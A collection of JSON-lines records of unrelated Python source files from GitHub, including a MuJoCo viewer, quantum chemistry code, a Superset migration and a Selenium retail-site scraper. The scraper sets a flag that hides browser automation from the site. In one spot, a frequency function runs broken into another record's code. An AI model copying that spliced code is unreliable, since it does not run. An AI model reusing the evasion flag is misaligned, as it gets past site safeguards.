{y_min > y_max}\n self.fig.range[1][0] = y_range[1]\n self.fig.range[1][1] = y_range[0]\n\n def set_grid_divisions(\n self, x_div: int, y_div: int, x_axis_time: float = 0.0\n ):\n self.fig.gridsize[0] = x_div + 1\n self.fig.gridsize[1] = y_div + 1\n if x_axis_time is not 0.0:\n self._num_pnts = x_axis_time / self.model.opt.timestep\n print(\"self._num_pnts: \", self._num_pnts)\n if self._num_pnts > 300:\n self._num_pnts = 300\n new_x_axis_time = self.model.opt.timestep * self._num_pnts\n print(\n f\"Minimum x_axis_time is: {new_x_axis_time}\"\n + \" reduce the x_axis_time\"\n f\" OR Maximum time_step is: \"\n + f\"{self.model.opt.timestep*self._num_pnts}\"\n + \" increase the timestep\"\n )\n # assert x_axis_time ==\n assert 1 <= self._num_pnts <= 300, (\n \"num_pnts should be [10,300], it is currently:\",\n f\"{self._num_pnts}\",\n )\n # self._num_pnts = num_pnts\n self._time_per_div = (self.model.opt.timestep * self._num_pnts) / (\n x_div\n )\n self.set_x_label(\n xname=f\"time/div: {self._time_per_div}s\"\n + f\" total: {self.model.opt.timestep * self._num_pnts}\"\n )\n\n def set_graph_name(self, name: str):\n assert type(name) == str, \"name is not a string\"\n self.fig.title = name\n\n def show_graph_legend(self, show_legend: bool = True):\n if show_legend is True:\n for i in range(0, len(self._data_graph_line_names)):\n self.fig.linename[i] = self._data_graph_line_names[i]\n self.fig.flg_legend = True\n\n def set_x_label(self, xname: str):\n assert type(xname) == str, \"xname is not a string\"\n self.fig.xlabel = xname\n\n def add_graph_line(self, line_name, line_data):\n assert (\n type(line_name) == str\n ), f\"Line_name is not a string: {type(line_name)}\"\n if line_name in self._data_graph_line_names:\n print(\"line name already exists\")\n else:\n self._data_graph_line_names.append(line_name)\n self._line_datas.append(line_data)\n\n def update_graph_line(self, line_name, line_data):\n if line_name in self._data_graph_line_names:\n idx = self._data_graph_line_names.index(line_name)\n self._line_datas[idx] = line_data\n else:\n raise NameError(\n \"line name is not valid, add it to list before calling update\"\n )\n\n def sensorupdate(self):\n # print(self._line_datas)\n pnt = int(mujoco.mju_min(self._num_pnts, self.fig.linepnt[0] + 1))\n # print(self.fig.linepnt[0] + 1)\n for n in range(0, len(self._line_datas)):\n for i in range(pnt - 1, 0, -1):\n self.fig.linedata[n][2 * i + 1] = self.fig.linedata[n][\n 2 * i - 1\n ]\n self.fig.linepnt[n] = pnt\n self.fig.linedata[n][1] = self._line_datas[n]\n\n def set_graph_units(self, type):\n if type == \"radian\":\n self._sensor_data == \"radian\"\n if type == \"degree\":\n self._sensor_data == \"degree\"\n\n def update_graph_size(self, size_div_x=None, size_div_y=None):\n if size_div_x is None and size_div_y is None:\n width, height = self.callbacks.get_viewport_width_height()\n width_adjustment = width % 3\n self.pid_viewport.left = int(2 * width / 3) + width_adjustment\n self.pid_viewport.width = int(width / 3)\n self.pid_viewport.height = int(height / 3)\n\n else:\n assert size_div_x is not None and size_div_y is None, \"\"\n width, height = self.callbacks.get_viewport_width_height()\n width_adjustment = width % size_div_x\n self.pid_viewport.left = (\n int((size_div_x - 1) * width / size_div_x) + width_adjustment\n )\n self.pid_viewport.width = int(width / size_div_x)\n self.pid_viewport.height = int(height / size_div_x)\n\n def render(self):\n # mjv_updateScene, mjr_render, mjr_overlay\n def update():\n # fill overlay items\n self._create_overlay()\n\n render_start = time.time()\n if self.callbacks.window is None:\n return\n elif glfw.window_should_close(self.callbacks.window):\n glfw.terminate()\n sys.exit(0)\n (\n self.callbacks.viewport.width,\n self.callbacks.viewport.height,\n ) = glfw.get_framebuffer_size(self.callbacks.window)\n with self.callbacks._gui_lock:\n # update scene\n mujoco.mjv_updateScene(\n self.model,\n self.data,\n self.vopt,\n self.pert,\n self.cam,\n mujoco.mjtCatBit.mjCAT_ALL.value,\n self.scn,\n )\n # marker items\n for marker in self._markers:\n self._add_marker_to_scene(marker)\n # render\n mujoco.mjr_render(\n self.callbacks.viewport, self.scn, self.callbacks.ctx\n )\n # overlay items\n if not self.callbacks._hide_menu:\n for gridpos, [t1, t2] in self._overlay.items():\n mujoco.mjr_overlay(\n mujoco.mjtFontScale.mjFONTSCALE_150,\n gridpos,\n self.callbacks.viewport,\n t1,\n t2,\n self.callbacks.ctx,\n )\n # Handle graph and pausing interactions\n if (\n not self.callbacks._hide_graph\n and not self.callbacks._paused\n ):\n self.sensorupdate()\n self.update_graph_size()\n mujoco.mjr_figure(\n self.pid_viewport, self.fig, self.callbacks.ctx\n )\n elif self.callbacks._hide_graph and self.callbacks._paused:\n self.update_graph_size()\n elif not self.callbacks._hide_graph and self.callbacks._paused:\n mujoco.mjr_figure(\n self.pid_viewport, self.fig, self.callbacks.ctx\n )\n elif self.callbacks._hide_graph and not self.callbacks._paused:\n self.sensorupdate()\n self.update_graph_size()\n\n self.callbacks._swap_buffers()\n self.callbacks._poll_events()\n self._time_per_render = 0.9 * self._time_per_render + 0.1 * (\n time.time() - render_start\n )\n\n # clear overlay\n self._overlay.clear()\n\n if self.callbacks._paused:\n while self.callbacks._paused:\n update()\n if self.callbacks._advance_by_one_step:\n self.callbacks._advance_by_one_step = False\n break\n else:\n self._loop_count += self.model.opt.timestep / (\n self._time_per_render * self.callbacks._run_speed\n )\n if self._fastmode is True:\n if not self.callbacks._render_every_frame:\n self._loop_count = 1\n while self._loop_count > 0:\n update()\n self._loop_count -= 1\n else:\n if self.callbacks._render_every_frame:\n self._loop_count = 1\n while self._loop_count > 0:\n update()\n self._loop_count -= 1\n\n # clear markers\n self._markers[:] = []\n\n # apply perturbation (should this come before mj_step?)\n self.apply_perturbations()\n\n def close(self):\n self.callbacks.close()\n","repo_name":"rohit-kumar-j/SPD_Controller_Mujoco","sub_path":"mujoco_viewer.py","file_name":"mujoco_viewer.py","file_ext":"py","file_size_in_byte":18902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"24221606313","text":"#Question-1\ndef frequency(l):\n (minfreqlist,maxfreqlist,newlist)=([],[],[])\n (minfreq,maxfreq,freq)=(len(l),0,0)\n for i in l:\n if i not in newlist:\n newlist.append(i)\n newlist.sort()\n for i in newlist:\n freq=0\n for j in l:\n if j == i:\n freq=freq+1\n if freq==maxfreq:\n maxfreqlist.append(i)\n if freq>maxfreq:\n maxfreqlist=[]\n maxfreq=freq\n maxfreqlist.append(i)\n if freq==minfreq:\n minfreqlist.append(i)\n if freq= 2:\n return [full_key,child.shape]\n\n def search_wrapper(self, search_func, pars, obj=None,kyroot=None):\n\n if obj is None:\n obj = self.hfile\n self.result = []\n kyroot='/'\n\n for ky in obj.keys():\n cky = os.path.join(kyroot,ky)\n child = self.hfile[cky]\n\n r = search_func(pars,child,full_key=cky,key=ky)\n\n if r:\n self.result.append(r)\n\n if not isinstance(child,h5py.Dataset):\n self.search_wrapper(search_func,pars,obj=child,kyroot=cky)\n\n return self.result\n\n\ncr = h5crawler(sys.argv[1])\n\nresult = cr.search_2d()\n#result = cr.search_key('data')\nfor r in result:\n print(r)\n\n","repo_name":"txolutions/pyspec","sub_path":"python/file/h5datasets.py","file_name":"h5datasets.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5521248172","text":"from textwrap import indent\r\nfrom selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nfrom time import sleep\r\nimport json\r\nfrom selenium.webdriver.common.by import By\r\n\r\n#scrape the data\r\noptions = webdriver.ChromeOptions() \r\noptions.add_argument('--disable-blink-features=AutomationControlled')\r\ndriver = webdriver.Chrome(options=options)\r\ndriver.delete_all_cookies()\r\ndriver.get(\"https://www.hollisterco.com/shop/us\")\r\ndriver.find_element_by_xpath('//*[@id=\"site-cookie-banner\"]/div/div/button[1]').click()\r\ndriver.find_element_by_xpath('//*[@id=\"cat-label-12552\"]').click()\r\ndriver.find_element_by_xpath('//*[@id=\"cat-166318_l2\"]/a').click()\r\nsleep(2)\r\ndriver.find_element_by_xpath('//*[@id=\"p-48918396\"]/div/div[2]/div[1]/a').click()\r\nsleep(1)\r\ndriver.execute_script(\"window.scrollBy(0,500)\",\"\")\r\nsleep(1)\r\ndriver.find_element_by_css_selector('body > main > section.product-page-v2-modules.product.no-linkify.catalog-v2.js-product-page.product_429975 > section.product-page__main-container.scope-1892 > section.product-page__info-container > div > form > div.js-product-attributes-inline > div > div.product-size-selection-header_wrapper > div > button')\r\nsleep(5)\r\ndriver.close()\r\n#organize the data\r\n\r\n#dump the data","repo_name":"CS322-spring22/shopsi","sub_path":"backend/holscrap.py","file_name":"holscrap.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22005024793","text":"import sys; sys.stdin = open(\"input/1316.txt\", \"r\")\n\nN = int(input())\narr = list(input() for _ in range(N))\n\ncount = 0\nfor i in range(N):\n over = []\n for j in range(len(arr[i])):\n flag = True\n if arr[i][j] in over:\n flag = False\n break\n if j < len(arr[i]) - 1:\n if arr[i][j] != arr[i][j+1]:\n over.append(arr[i][j])\n if flag == True:\n count += 1\n\nprint(count)","repo_name":"vreez/APS","sub_path":"boj/boj_1316_그룹 단어 체커.py","file_name":"boj_1316_그룹 단어 체커.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23490526181","text":"n = int(raw_input())\nabc = 0\nfor i in range(n):\n\tabc+=1\n\tr = int(raw_input())\n\tif(r==0):\n\t\tprint(\"Case #\"+str(abc)+\": \"\"INSOMNIA\")\n\telse:\n\t\td = [0 for i in range(10)]\n\t\tvisited = 0\n\t\tk = 0\n\t\tcount = 1\n\t\twhile(k==0):\n\t\t\ttemp = r*count\n\t\t\twhile(temp!=0):\n\t\t\t\tif(d[temp%10]==0):\n\t\t\t\t\td[temp%10]=1\n\t\t\t\t\tvisited+=1\n\t\t\t\t\tif(visited==10):\n\t\t\t\t\t\tk=1\n\t\t\t\t\t\tbreak\n\t\t\t\ttemp/=10\n\t\t\tcount+=1\n\t\tprint(\"Case #\"+str(abc)+\": \"+str(r*(count-1)))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_177/915.py","file_name":"915.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37510991795","text":"\"\"\"\nC-like implementaiton of of pCCD equations.\n\nTODO: vectorize further with numpy. current form is to compare with other codes\n\"\"\"\nfrom itertools import product\nimport numpy as np\nimport openfermion as of\n\n\ndef get_h2o():\n # from openfermionpsi4 import run_psi4\n from openfermionpyscf import run_pyscf\n geometry = [['O', [0.000000000000, 0.000000000000, -0.068516219320]],\n ['H', [0.000000000000, -0.790689573744, 0.543701060715]],\n ['H', [0.000000000000, 0.790689573744, 0.543701060715]]]\n multiplicity = 1\n charge = 0\n basis = '6-31g'\n molecule = of.MolecularData(geometry=geometry, multiplicity=multiplicity,\n charge=charge, basis=basis)\n molecule = run_pyscf(molecule)\n print(molecule.hf_energy)\n return molecule\n\n\nclass pCCD:\n\n def __init__(self, molecule=None, iter_max=100, e_convergence=1.0E-6,\n r_convergence=1.0E-6, oei=None, tei=None, n_electrons=None,\n enuc=0):\n self.molecule = molecule\n self.t0 = None\n self.sigma = None\n self.iter_max = iter_max\n self.e_convergence = e_convergence\n self.r_convergence = r_convergence\n\n if molecule is None and (oei is not None and tei is not None and n_electrons is not None):\n self.oei = oei\n self.tei = tei\n self.o = n_electrons // 2\n norbs = oei.shape[0]\n self.v = norbs - self.o\n self.enuc = enuc\n else:\n self.o = molecule.n_electrons // 2\n self.v = molecule.n_orbitals - self.o\n oei, tei = molecule.get_integrals()\n self.oei = oei\n self.tei = tei\n self.enuc = molecule.nuclear_repulsion\n\n def setup_integrals(self):\n oei, tei = self.oei, self.tei\n o, v = self.o, self.v\n\n self.v_iiaa = np.zeros(o * v)\n self.v_iaia = np.zeros(o * v)\n self.v_ijij = np.zeros(o * o)\n self.v_abab = np.zeros(v * v)\n self.f_o = np.zeros(o)\n self.f_v = np.zeros(v)\n\n # print(\"v_(ii|aa)\")\n for i in range(o):\n for a in range(v):\n self.v_iiaa[i * v + a] = tei[i, a + o, a + o, i]\n\n # print(\"v_(ia|ia)\")\n for i in range(o):\n for a in range(v):\n self.v_iaia[i * v + a] = tei[i, i, a + o, a + o]\n\n # print(\"v_(ij|ij)\")\n for i in range(o):\n for j in range(o):\n self.v_ijij[i * o + j] = tei[i, i, j, j]\n\n # print(\"v_(ab|ab)\")\n for a in range(v):\n for b in range(v):\n self.v_abab[a * v + b] = tei[a + o, a + o, b + o, b + o]\n\n # print(\"fock (o)\")\n for i in range(o):\n dum = oei[i, i]\n for k in range(o):\n dum += 2 * tei[i, k, k, i]\n dum -= tei[i, k, i, k]\n self.f_o[i] = dum\n\n # print(\"fock (v)\")\n for a in range(v):\n dum = oei[a + o, a + o]\n for k in range(o):\n dum += 2 * tei[a + o, k, k, a + o]\n dum -= tei[a + o, k, a + o, k]\n self.f_v[a] = dum\n\n self.escf = self.enuc # molecule.nuclear_repulsion\n for i in range(o):\n self.escf += oei[i, i] + self.f_o[i]\n\n def compute_energy(self):\n o, v = self.o, self.v\n en = 0\n\n # initialize amplitudes to zero\n self.t2 = np.zeros(o * v)\n self.setup_integrals()\n iter = 0\n\n while iter < self.iter_max:\n\n self.evaluate_residual()\n\n # update amplitudes\n for i in range(o):\n for a in range(v):\n self.residual[i * v + a] *= -0.5 / (self.f_v[a] - self.f_o[i])\n\n self.t0 = self.residual.copy()\n self.t0 = self.t0 + -self.t2\n\n nrm = np.linalg.norm(self.t0)\n self.t2 = self.residual.copy()\n\n dE = en\n en = self.evaluate_projected_energy()\n dE -= en\n print(\"\\t\\t\\t{}\\t{: 5.10f}\\t{: 5.10f}\\t{: 5.10f}\".format(iter, en, dE, nrm))\n\n if np.abs(dE) < self.e_convergence and nrm < self.r_convergence:\n break\n\n iter += 1\n\n self.correlation_energy = en\n self.total_energy = self.escf + en\n print(\"\\t\\tIterations Converged\")\n print(\"\\t\\tCorrelation Energy {: 5.20f}\".format(self.total_energy - self.escf))\n print(\"\\t\\tTotal Energy {: 5.20f}\".format(self.total_energy))\n\n\n def evaluate_projected_energy(self):\n o, v = self.o, self.v\n energy = 0.\n # reset t0 to ones\n for i in range(o):\n for a in range(v):\n energy += self.t2[i * v + a] * self.v_iaia[i * v + a]\n return energy\n\n def normalize(self):\n self.t0 = np.ones(self.o * self.v)\n\n def evaluate_residual(self):\n o, v = self.o, self.v\n self.normalize()\n self.residual = np.zeros(o * v)\n self.residual = self.evaluate_sigma()\n\n VxT_v = np.zeros(v)\n VxT_o = np.zeros(o)\n VxT_oo = np.zeros(o * o)\n\n # print(\"VxT_v \")\n for a in range(v):\n # contract over the occupied space to get the virtual index\n VxT_v[a] = -2.0 * np.dot(self.v_iaia[a::v], self.t2[a::v])\n\n # print(\"VxT_o \")\n for i in range(o):\n # contract over the virtual index of the vectorized matrix\n VxT_o[i] = -2.0 * np.dot(self.v_iaia[i * v:(i + 1) * v], self.t2[i * v: (i + 1)* v ])\n\n # print(\"VxT_oo(i,j) = (jb|jb) t(i,b)\")\n for i, j in product(range(o), repeat=2):\n VxT_oo[i * o + j] = np.dot(self.v_iaia[j*v:(j + 1)*v], self.t2[i*v:(i + 1)*v])\n\n # // r2(i,a) += t(j,a) VxT_oo(i,j)\n for i in range(o):\n for a in range(v):\n # sum over j index\n self.residual[i * v + a] += np.dot(self.t2[a::v], VxT_oo[i * o:(i + 1) * o])\n\n # print(\"VxT_v and o contraction\")\n for i in range(o):\n for a in range(v):\n dum = 0.\n dum += VxT_v[a] * self.t2[i * v + a]\n dum += VxT_o[i] * self.t2[i * v + a]\n\n t_t2 = self.t2[i * v + a]\n dum += 2.0 * self.v_iaia[i * v + a] * t_t2 * t_t2\n self.residual[i * v + a] += dum\n\n def evaluate_sigma(self):\n \"\"\"\n Evaluate\n \"\"\"\n o, v = self.o, self.v\n sigma = self.v_iaia.copy()\n for i in range(o):\n for a in range(v):\n sigma[i * v + a] -= 2 * (2 * self.v_iiaa[i * v + a] - self.v_iaia[i * v + a]) * self.t2[i * v + a]\n\n for i in range(o):\n for a in range(v):\n dum = 0\n for b in range(v):\n dum += self.v_abab[a * v + b] * self.t2[i * v + b]\n for j in range(o):\n dum += self.v_ijij[i * o + j] * self.t2[j * v + a]\n sigma[i * v + a] += dum\n return sigma\n\n\nif __name__ == \"__main__\":\n molecule = get_h2o()\n pccd = pCCD(molecule, iter_max=20)\n pccd.setup_integrals()\n pccd.compute_energy()\n\n print(\"pCCD T2 amps\")\n for i in range(pccd.o):\n for a in range(pccd.v):\n print(\"{}\\t{}\\t{: 5.20f}\".format(i, a, pccd.t2[i * pccd.v + a]))\n\n from lambda_ccd_with_pccd_restriction import LambdaCCD\n from openfermion.chem.molecular_data import spinorb_from_spatial\n from lambda_ccd import kernel, ccsd_energy\n # pccd_lccd = LambdaCCD(molecule, restrict_to_pair_doubles=False)\n # oei, tei = molecule.oei, pccd.tei\n oei, tei = molecule.get_integrals()\n soei, stei = spinorb_from_spatial(oei, tei)\n astei = np.einsum('ijkl', stei) - np.einsum('ijlk', stei)\n gtei = astei.transpose(0, 1, 3, 2)\n\n mf = molecule._pyscf_data['scf']\n occ = mf.mo_occ\n nele = int(sum(occ))\n nocc = nele // 2\n norbs = oei.shape[0]\n nsvirt = 2 * (norbs - nocc)\n nsocc = 2 * nocc\n\n eps = np.kron(molecule.orbital_energies, np.ones(2))\n n = np.newaxis\n o = slice(None, nsocc)\n v = slice(nsocc, None)\n\n\n\n e_abij = 1 / (-eps[v, n, n, n] - eps[n, v, n, n] + eps[n, n, o, n] + eps[\n n, n, n, o])\n e_ai = 1 / (-eps[v, n] + eps[n, o])\n\n fock = soei + np.einsum('piiq->pq', astei[:, o, o, :])\n hf_energy = 0.5 * np.einsum('ii', (fock + soei)[o, o])\n hf_energy_test = 1.0 * np.einsum('ii', fock[o, o]) -0.5 * np.einsum('ijij', gtei[o, o, o, o])\n print(\"HF energies\")\n print(hf_energy, mf.e_tot - mf.energy_nuc())\n\n\n # pccd_lccd.solve_cc_equations(soei, astei)\n t1z, t2z = np.zeros((nsvirt, nsocc)), np.zeros((nsvirt, nsvirt, nsocc, nsocc))\n t1f, t2f, l1f, l2f = kernel(t1z, t2z, fock, gtei, o, v, e_ai, e_abij,\n stopping_eps=1.0E-12)\n\n print(\"Final Correlation Energy\")\n print(ccsd_energy(t1f, t2f, fock, gtei, o, v) - hf_energy)\n\n print(\"E(CCSD)-NCR = {}\".format(ccsd_energy(t1f, t2f, fock, gtei, o, v) + mf.energy_nuc()))\n\n mycc = mf.CCSD()\n mycc.conv_tol = 1.0E-12\n ecc, pyscf_t1, pyscf_t2 = mycc.kernel()\n print('CCSD correlation energy', mycc.e_corr)\n\n\n\n lccd = LambdaCCD(molecule=molecule, e_convergence=mycc.conv_tol)\n lccd.solve_cc_equations(soei, astei)\n\n\n from pyscf import cc\n mycc = cc.CCSD(mf)\n old_update_amps = mycc.update_amps\n def update_amps(t1, t2, eris):\n t1, t2 = old_update_amps(t1, t2, eris)\n return t1 * 0, t2\n mycc.update_amps = update_amps\n mycc.kernel()\n\n lccd = LambdaCCD(molecule=molecule, e_convergence=mycc.conv_tol, restrict_to_pair_doubles=True,\n iter_max=500)\n lccd.solve_cc_equations(soei, astei)\n\n pccd = pCCD(molecule, iter_max=20)\n pccd.setup_integrals()\n pccd.compute_energy()\n\n\n\n","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/cc/projective_cc/pccd.py","file_name":"pccd.py","file_ext":"py","file_size_in_byte":9783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"25167550135","text":"revision = \"9c2a5681ddfd\"\ndown_revision = \"f3c2d8ec8595\"\n\nimport io\nimport json\nimport pickle\n\nfrom alembic import op\nfrom sqlalchemy import Column, Integer, LargeBinary, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Session\n\nfrom superset import db\nfrom superset.migrations.shared.utils import paginated_update\n\nBase = declarative_base()\nVALUE_MAX_SIZE = 2**24 - 1\nRESOURCES_TO_MIGRATE = (\"app\", \"dashboard_permalink\", \"explore_permalink\")\n\n\nclass RestrictedUnpickler(pickle.Unpickler):\n def find_class(self, module, name):\n if not (module == \"superset.utils.core\" and name == \"DatasourceType\"):\n raise pickle.UnpicklingError(f\"Unpickling of {module}.{name} is forbidden\")\n\n return super().find_class(module, name)\n\n\nclass KeyValueEntry(Base):\n __tablename__ = \"key_value\"\n id = Column(Integer, primary_key=True)\n resource = Column(String(32), nullable=False)\n value = Column(LargeBinary(length=VALUE_MAX_SIZE), nullable=False)\n\n\ndef upgrade():\n bind = op.get_bind()\n session: Session = db.Session(bind=bind)\n truncated_count = 0\n for entry in paginated_update(\n session.query(KeyValueEntry).filter(\n KeyValueEntry.resource.in_(RESOURCES_TO_MIGRATE)\n )\n ):\n try:\n value = RestrictedUnpickler(io.BytesIO(entry.value)).load() or {}\n except pickle.UnpicklingError as ex:\n if str(ex) == \"pickle data was truncated\":\n # make truncated values that were created prior to #20385 an empty\n # dict so that downgrading will work properly.\n truncated_count += 1\n value = {}\n else:\n raise\n\n entry.value = bytes(json.dumps(value), encoding=\"utf-8\")\n\n if truncated_count:\n print(f\"Replaced {truncated_count} corrupted values with an empty value\")\n\n\ndef downgrade():\n bind = op.get_bind()\n session: Session = db.Session(bind=bind)\n for entry in paginated_update(\n session.query(KeyValueEntry).filter(\n KeyValueEntry.resource.in_(RESOURCES_TO_MIGRATE)\n ),\n ):\n value = json.loads(entry.value) or {}\n entry.value = pickle.dumps(value)\n","repo_name":"apache/superset","sub_path":"superset/migrations/versions/2023-05-01_12-03_9c2a5681ddfd_convert_key_value_entries_to_json.py","file_name":"2023-05-01_12-03_9c2a5681ddfd_convert_key_value_entries_to_json.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"}
+{"seq_id":"18430587700","text":"import streamlit as st\nimport modal\nimport json\nimport os\n\nst.set_page_config(\n page_title=\"PhilosoCasts\",\n page_icon=\"🎧\",\n# layout=\"wide\",\n# initial_sidebar_state=\"expanded\",\n)\n\ndef main():\n st.title(\"🤔 PhilosoCasts! 🎧 \")\n\n available_podcast_info = create_dict_from_json_files('.')\n\n # Left section - Input fields\n st.sidebar.header(\"Convert your favorite Podcasts into short Platonic Dialogues!\")\n\n # Dropdown box\n st.sidebar.subheader(\"Available Podcasts Feeds to Try!\")\n selected_podcast = st.sidebar.selectbox(\"Select Podcast:\", options=available_podcast_info.keys())\n\n if selected_podcast:\n\n podcast_info = available_podcast_info[selected_podcast]\n\n # # Right section - Newsletter content\n # st.header(\"Newsletter Content\")\n\n # Display the podcast title\n\n st.write(podcast_info['podcast_details']['episode_title'])\n\n # Display the podcast summary and the cover image in a side-by-side layout\n col1, col2 = st.columns([7, 3])\n\n with col1:\n # Display the podcast episode summary\n st.subheader(\"Key Arguments from Podcast\")\n st.write(podcast_info['podcast_summary'])\n\n with col2:\n st.image(podcast_info['podcast_details']['episode_image'], caption=\"Podcast Cover\", width=300, use_column_width=True)\n\n # Display the podcast guest and their details in a side-by-side layout\n col3, col4 = st.columns([3, 7])\n\n with col3:\n st.subheader(\"Podcast Guest\")\n st.write(podcast_info['podcast_guest']['name'])\n\n with col4:\n st.subheader(\"Podcast Guest Details\")\n st.write(podcast_info[\"podcast_guest\"]['summary'])\n\n # Display the five key moments\n st.subheader(\"Key Moments\")\n key_moments = podcast_info['podcast_highlights']\n for moment in key_moments.split('\\n'):\n st.markdown(\n f\"{moment}
\", unsafe_allow_html=True)\n\n # User Input box\n st.markdown(\"---\")\n st.sidebar.image(\"assets/plato.png\")\n st.sidebar.subheader(\"Philosocast Your Own Podcast Feed:\")\n\n openai_api_key = st.sidebar.text_input(\n label=\"Get your [OpenAI API Key](https://platform.openai.com/account/api-keys)\", placeholder=\"Paste your OpenAI API Key here (sk-...)\",\n type='password'\n)\n url = st.sidebar.text_input(\"Get a [Podcast RSS Feed](https://www.listennotes.com/)\", placeholder =\"Paste RSS Feed link\")\n\n process_button = st.sidebar.button(\"Philosocast Your Podcast Feed!\")\n st.sidebar.markdown(\"**Note**: Philosocasting can take up to 5 minutes, please be patient...philosophizing ain't easy 😜\")\n\n if process_button:\n\n # Call the function to process the URLs and retrieve podcast guest information\n podcast_info = process_podcast_info(url)\n\n # Right section - Newsletter content\n st.header(\"Newsletter Content\")\n\n # Display the podcast title\n st.subheader(\"Episode Title\")\n st.write(podcast_info['podcast_details']['episode_title'])\n\n # Display the podcast summary and the cover image in a side-by-side layout\n col1, col2 = st.columns([7, 3])\n\n with col1:\n # Display the podcast episode summary\n st.subheader(\"Podcast Episode Summary\")\n st.write(podcast_info['podcast_summary'])\n\n with col2:\n st.image(podcast_info['podcast_details']['episode_image'], caption=\"Podcast Cover\", width=300, use_column_width=True)\n\n # Display the podcast guest and their details in a side-by-side layout\n col3, col4 = st.columns([3, 7])\n\n with col3:\n st.subheader(\"Podcast Guest\")\n st.write(podcast_info['podcast_guest']['name'])\n\n with col4:\n st.subheader(\"Podcast Guest Details\")\n st.write(podcast_info[\"podcast_guest\"]['summary'])\n\n # Display the five key moments\n st.subheader(\"What would other philosophers say about this episode? 🤔\")\n key_moments = podcast_info['podcast_highlights']\n for moment in key_moments.split('\\n'):\n st.markdown(\n f\"{moment}
\", unsafe_allow_html=True)\n\ndef create_dict_from_json_files(folder_path):\n json_files = [f for f in os.listdir(folder_path) if f.endswith('.json')]\n data_dict = {}\n\n for file_name in json_files:\n file_path = os.path.join(folder_path, file_name)\n with open(file_path, 'r') as file:\n podcast_info = json.load(file)\n podcast_name = podcast_info['podcast_details']['podcast_title']\n # Process the file data as needed\n data_dict[podcast_name] = podcast_info\n\n return data_dict\n\ndef process_podcast_info(url):\n f = modal.Function.lookup(\"corise-podcast-project\", \"process_podcast\")\n output = f.call(url, '/content/podcast/')\n return output\n\nif __name__ == '__main__':\n main()\n","repo_name":"ughdeeb/philosocasts","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":4984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42357610524","text":"import re\n\nimport cv2\nimport pytesseract\nfrom pytesseract import Output\n\n\ndef detect_text(image, lib=None):\n if lib == 'TESSERACT':\n return detect_text_with_tesseract(image)\n else:\n print('OCR library not specified. Running Tesseract.')\n return detect_text_with_tesseract(image)\n\n\ndef detect_text_with_tesseract(image):\n d = pytesseract.image_to_data(image, output_type=Output.DICT)\n n_boxes = len(d['level'])\n boxes = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)\n for i in range(n_boxes):\n (x, y, w, h) = (d['left'][i], d['top'][i], d['width'][i], d['height'][i])\n boxes = cv2.rectangle(boxes, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n lines = pytesseract.image_to_string(image)\n\n result = list(filter(lambda x: len(x) != 0, lines.splitlines()))\n\n res = parse_item_lines(result)\n return boxes, res\n\n\ndef format_dollar_value(value):\n # Match the dollar value using regex\n match = re.match(r'^(\\$?\\d+)\\.(\\d+)$|^(\\$?\\d+)$|^\\.(\\d+)$|^(\\d+)\\.(\\d+)$|^(\\d+)$', value)\n if match:\n # Extract the numbers before and after the decimal point\n groups = match.groups()\n dollars = int(groups[0] or groups[2] or groups[4] or groups[5] or groups[6] or 0)\n cents = int(groups[1] or groups[3] or 0)\n # Format the numbers as xx.xx\n return \"{:02d}.{:02d}\".format(dollars, cents)\n else:\n # Return the original value if it doesn't match the expected format\n return value\n\n\ndef parse_item_lines(lines):\n regex = r'^(\\w+(?:[\\s+\\w+~.])*)\\s+((\\$?\\d*(?: *\\.\\d+)?|\\$?\\d*(?:\\.\\d+ *)?))$'\n\n res = []\n for line in lines:\n parsed_line = re.match(regex, line)\n if parsed_line:\n name = parsed_line.group(1)\n value = parsed_line.group(2)\n\n value = format_dollar_value(value.removeprefix('$'))\n\n item = {\"name\": name, \"value\": value}\n res.append(item)\n return res","repo_name":"wongyuhao/MOMO","sub_path":"text_detection.py","file_name":"text_detection.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39135194903","text":"\r\nimport xml.etree.cElementTree as ET\r\nfrom collections import defaultdict\r\nimport re\r\nimport pprint\r\nimport codecs\r\n\r\n\r\nOSMFILE = \"san-francisco_california.osm\"\r\n\r\n# Definition of re expressions\r\nstreet_type_re = re.compile(r'\\b\\S+\\.?$', re.IGNORECASE)\r\npostcode_re = re.compile(r'[a-z=\\+/&<>;\\_\\'\"\\?%#$@\\,\\. \\t\\r\\n]', re.IGNORECASE)\r\nname_re = re.compile(r'^[0-9]+$')\r\n\r\n# List of expected street types\r\nexpected = [\"Street\", \"Avenue\", \"Boulevard\", \"Drive\", \"Court\", \"Place\", \"Square\", \"Lane\", \"Road\", \r\n \"Trail\", \"Parkway\", \"Commons\", \"Circle\", \"Alley\", \"Terrace\", \"Path\", \"Highway\", \"Center\", \"Crescent\", \"Way\", \"Walk\", \"Plaza\", \"Loop\", \"View\", \"Mall\", \"Freeway\", \"Lane\"]\r\n\r\n\r\ndef audit_street_type(street_types, street_name):\r\n m = street_type_re.search(street_name)\r\n if m:\r\n street_type = m.group()\r\n if street_type not in expected:\r\n 